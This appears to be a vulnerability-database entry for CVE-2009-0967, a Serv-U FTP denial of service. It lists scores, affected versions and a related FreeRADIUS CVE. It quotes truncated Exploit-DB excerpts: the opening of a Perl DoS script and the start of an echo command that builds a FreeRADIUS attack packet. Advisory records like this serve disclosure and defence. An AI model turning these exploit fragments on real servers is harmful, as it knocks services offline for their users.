CVE-2009-0967
published 2009-03-19
Priority P4 · 19 · medium · 4 · CVSS 2.0
AV:N/AC:L/Au:S/C:N/I:N/A:P
EXPLOIT
EPSS: 7.03% (93.4th percentile)
The FTP server in Serv-U 7.0.0.1 through 7.4.0.1 allows remote authenticated users to cause a denial of service (service hang) via a large number of SMNT commands without an argument.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_file_server | — | — |
CVSS provenance
nvd · v2.0 · 4.0 MEDIUM · AV:N/AC:L/Au:S/C:N/I:N/A:P
vendor_redhat · 5.0 MEDIUM
GHSA
ghsa_unreviewed·2022-05-02
CVE-2009-0967 [MEDIUM] GHSA-f8vp-2v87-h22x: The FTP server in Serv-U 7
The FTP server in Serv-U 7.0.0.1 through 7.4.0.1 allows remote authenticated users to cause a denial of service (service hang) via a large number of SMNT commands without an argument.
Red Hat
vendor_redhat·2009-09-07·CVSS 5.0
CVE-2009-3111 [MEDIUM] FreeRADIUS: Missing check for Tunnel-Password attributes with zero length (DoS) -- re-appearance of CVE-2003-0967
The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes, as demonstrated by a certain module in VulnDisco Pack Professional 7.6 through 8.11. NOTE: this is a regression error related to CVE-2003-0967.
No detection rules found.
Exploit-DB
exploitdb·2009-03-16
CVE-2009-0967 RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' (Authenticated) Denial of Service
---
#!/usr/bin/perl
# Soft : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";
if (@ARGV \n";
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";
$evil
Exploit-DB
exploitdb·2003-11-20
CVE-2003-0967 FreeRadius 0.x/1.1.x - Tag Field Heap Corruption
---
source: https://www.securityfocus.com/bid/9079/info
FreeRADIUS is prone to a heap-corruption vulnerability when handling tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles the 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x